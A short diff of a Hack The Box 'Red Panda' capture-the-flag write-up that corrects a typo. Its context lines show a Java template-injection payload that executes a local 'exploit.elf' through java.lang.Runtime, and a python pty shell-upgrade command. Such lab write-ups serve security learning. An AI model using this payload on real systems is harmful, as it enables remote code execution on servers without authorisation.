Rogue-1/HTB/FullPWN/Red Panda.md

 ```
 *{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./exploit.elf")}
 ```
-Awesome we get a shell but its pretty bas so lets upgrade it and grab our user flag!
+Awesome we get a shell but its pretty bad so lets upgrade it and grab our user flag!

 ```
 python3 -c 'import pty; pty.spawn("/bin/bash")'